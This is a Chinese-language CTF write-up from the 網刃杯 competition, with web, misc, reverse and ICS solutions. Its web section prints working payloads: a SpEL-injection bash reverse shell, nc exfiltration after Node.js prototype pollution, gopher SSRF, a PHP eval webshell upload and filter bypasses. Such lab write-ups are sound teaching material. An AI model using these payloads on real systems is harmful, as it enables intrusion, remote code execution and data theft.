網刃盃賽題-部分WP
點選藍字
關注我們
宣告
本文作者:WgpCTF
本文字數:16140
閱讀時長:30分鐘
附件/連結 :點選檢視原文下載
本文屬於【狼組安全社群】原創獎勵計劃,未經許可禁止轉載
由於傳播、利用此文所提供的資訊而造成的任何直接或者間接的後果及損失,均由使用者本人負責,狼組安全團隊以及文章作者不為此承擔任何責任。
狼組安全團隊有對此文章的修改和解釋權。如欲轉載或傳播此文章,必須保證此文章的完整性,包括版權宣告等全部內容。未經狼組安全團隊允許,不得任意修改或者增減此文章內容,不得以任何方式將其用於商業目的。
本文為團隊CTF戰隊參加網刃杯CTF比賽的部分賽題WP,歡迎小夥伴一起共同交流學習!
一、
WEB類
ez_java
能下原始碼檔案,下載 web.xml 找到 TestServlet.class 檔案,路徑是 test388
/download?filename=../../../classes/com/abc/servlet/TestServlet.class
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by Fernflower decompiler)
//
package com.abc.servlet;
import java.io.IOException;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import org.springframework.expression.Expression;
import org.springframework.expression.ParserContext;
import org.springframework.expression.common.TemplateParserContext;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.StandardEvaluationContext;
public class TestServlet extends HttpServlet {
public TestServlet() {
}
protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
this.doPost(req, resp);
}
protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
try {
String name = request.getParameter("name");
name = new String(name.getBytes("ISO8859-1"), "UTF-8");
if (this.blackMatch(name)) {
request.setAttribute("message", "name is invalid");
request.getRequestDispatcher("/message.jsp").forward(request, response);
return;
}
System.out.println(name);
String message = this.getAdvanceValue(name);
request.setAttribute("message", message);
request.getRequestDispatcher("/message.jsp").forward(request, response);
} catch (Exception var5) {
request.setAttribute("message", "error");
request.getRequestDispatcher("/message.jsp").forward(request, response);
}
}
private boolean blackMatch(String val) {
String[] var2 = this.getBlacklist();
int var3 = var2.length;
for(int var4 = 0; var4 < var3; ++var4) {
String keyword = var2[var4];
Matcher matcher = Pattern.compile(keyword, 34).matcher(val);
if (matcher.find()) {
return true;
}
}
return false;
}
private String getAdvanceValue(String val) {
ParserContext parserContext = new TemplateParserContext();
SpelExpressionParser parser = new SpelExpressionParser();
Expression exp = parser.parseExpression(val, parserContext);
StandardEvaluationContext evaluationContext = new StandardEvaluationContext();
return exp.getValue(evaluationContext).toString();
}
private String[] getBlacklist() {
return new String[]{"java.+lang", "Runtime", "exec.*\\("};
}
}
繞一下過濾
#{''.getClass().forName('java.lan'+'g.Run'+'time').getMethod('exe'+'c',''.getClass()).invoke(''.getClass().forName('java.lan'+'g.Run'+'time').getMethod('getRun'+'time').invoke(null),'bash -c bash$IFS$9-i>&/dev/tcp/xxx.xxx.xxx.xxx/5555<&1')
彈回到vps裡
POST /test388?name=%23%7b%27%27%2e%67%65%74%43%6c%61%73%73%28%29%2e%66%6f%72%4e%61%6d%65%28%27%6a%61%76%61%2e%6c%61%6e%27%2b%27%67%2e%52%75%6e%27%2b%27%74%69%6d%65%27%29%2e%67%65%74%4d%65%74%68%6f%64%28%27%65%78%65%27%2b%27%63%27%2c%27%27%2e%67%65%74%43%6c%61%73%73%28%29%29%2e%69%6e%76%6f%6b%65%28%27%27%2e%67%65%74%43%6c%61%73%73%28%29%2e%66%6f%72%4e%61%6d%65%28%27%6a%61%76%61%2e%6c%61%6e%27%2b%27%67%2e%52%75%6e%27%2b%27%74%69%6d%65%27%29%2e%67%65%74%4d%65%74%68%6f%64%28%27%67%65%74%52%75%6e%27%2b%27%74%69%6d%65%27%29%2e%69%6e%76%6f%6b%65%28%6e%75%6c%6c%29%2c%27%62%61%73%68%20%2d%63%20%62%61%73%68%24%49%46%53%24%39%2d%69%3e%26%2f%64%65%76%2f%74%63%70%2f%38%32%2e%31%35%37%2e%31%36%31%2e%31%38%37%2f%35%35%35%35%3c%26%31%27%29%7d HTTP/1.1
Host: 124.220.9.19:8024
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
SIGNIN
能讀檔案
172.73.25.21 附近的ip沒有web服務
翻 arp 記錄,找到另一個 web
gopher協議post傳參
硬套
GET /?url=gopher://172.73.25.100:80/_POST%2520/%253Fa%253D1%2520HTTP/1.1%250D%250AHost%253A%2520172.73.25.100%250D%250AUser-Agent%253A%2520Mozilla/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%253B%2520rv%253A87.0%2529%2520Gecko/20100101%2520Firefox/87.0%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AReferer%253A%2520bolean.club%250D%250AX-Forwarded-For%253A%2520127.0.0.1%250D%250AX-Originating-IP%253A%2520127.0.0.1%250D%250AX-Remote-IP%253A%2520127.0.0.1%250D%250AX-Remote-Addr%253A%2520127.0.0.1%250D%250AContent-Length%253A%25203%250D%250A%250D%250Ab%253D2%250D%250A HTTP/1.1
Host: 124.220.9.19:20002
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
ezjs
http://124.222.24.150:10002/
可以參考: http://www.kitsch.live/2021/03/14/nodejs%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93/
空格被攔了用 ${IFS} 替代
POST / HTTP/1.1
Host: 124.222.173.163:10002
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: image/webp,*/*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://124.222.173.163:10002/
X-Forwarded-For: localhost
Content-Type: application/json
Content-Length: 149
{"__proto__":{"sourceURL":"\nglobal.process.mainModule.constructor._load('child_process')
.exec('ls${IFS}-al${IFS}|nc${IFS}152.136.230.235:8000')//"}}
flag在/.flag
簡單fuzz發現被攔截: * = flag less cat tac tail nl
發現od沒攔截 flag關鍵字可以用fla\\g替換
以十六進位制輸出
POST / HTTP/1.1
Host: 124.222.173.163:10002
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: image/webp,*/*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://124.222.173.163:10002/
X-Forwarded-For: localhost
Content-Type: application/json
Content-Length: 158
{"__proto__":{"sourceURL":"\nglobal.process.mainModule.constructor._load('child_process').
exec('od${IFS}-tx1${IFS}/.fla\\g|nc${IFS}152.136.230.235:8000')//"}}
手動把偏移位刪掉,010新建十六進位制檔案,得到flag
upload
POST / HTTP/1.1
Host: 124.220.9.19:8002
Content-Length: 226
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://124.220.9.19:8002
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryD87uydBACUiWGZBm
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://124.220.9.19:8002/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundaryD87uydBACUiWGZBm
Content-Disposition: form-data; name="upfile"; filename="p7.php"
Content-Type: ctf
<?php @eval($_POST['pass']);echo "Hello world!"; ?>
------WebKitFormBoundaryD87uydBACUiWGZBm--
說是不解析,但實際上肯定解析了,而且返回的也不是檔案本身
猜測是從資料庫在判斷規則互動
檔名是注入點
直接猜flag表flag欄位
flag{5937a0b90b5966939cccd36929
查右邊
}aa86c192963dccc9396695b09b0a73
flag{5937a0b90b5966939cccd369291c68aa}
二、
MISC
xyp07
壓縮包內註釋
Vm0weGQxRXlTWGxVV0d4V1YwZFNVRlpyV25kWlZsSllZMFZrVmxKdVFsaFdNalZMWWtkS1IxTnFSbGhYU0VKNlZsWmFWMVpWTVVWaGVqQTk=
解碼後得到
壓縮包密碼 Xyp77&7&77
wireshark 開啟,過濾條件
cotp && cotp.type == 0x0f && s7comm.header.rosctr == 1 && s7comm.param.func == 0x05
資料包 1425 有問題
iPE=e>we,9:={]RnBjf<7_8Cw1b
base91解碼
welcome_S7_world_xyp07
flag{welcome_S7_world_xyp07}
三、
REVERSE
freestyle
計算可知為3327
計算可知為105
flag{31a364d51abd0c8304106c16779d83b1}
四、
ICS
easyice
搜字串flag即可
carefulguy
拼起來
666c61677b7034757333313576337279316e7433726573746963397d
flag{p4us315v3ry1nt3restic9}
狼組CTF戰隊持續招人中~歡迎簡歷投遞[email protected]
- 記錄一次平平無奇的雲上攻防過程
- 低成本打造近源滲透神器(一)
- VSCTF WP
- CF 雲環境利用框架,一鍵化滲透雲上內網
- APISIX CVE-2022-29266 漏洞分析與復現
- 程序注入之FunctionStomping
- 網刃盃賽題-部分WP
- 記一次程式碼審計打點
- JDBC安全
- 使用BOT定製安全資訊推送
- php程式碼審計一條龍思路
- 一鍵建立隱藏賬號
- 網路空間測繪溯源技術剖析
- CTF-WEB系列篇(一)
- 深育杯 WriteUp
- 從Apache整體結構入手分析Apache CVE-2021-40438
- 資訊收集神器—大寶劍 3.0!你從未體驗過的全新版本~
- .Jar To .EXE免殺馬探索
- Java記憶體攻擊技術漫談
- 反制 Goby RCE 復現及 Mac 使用者防禦策略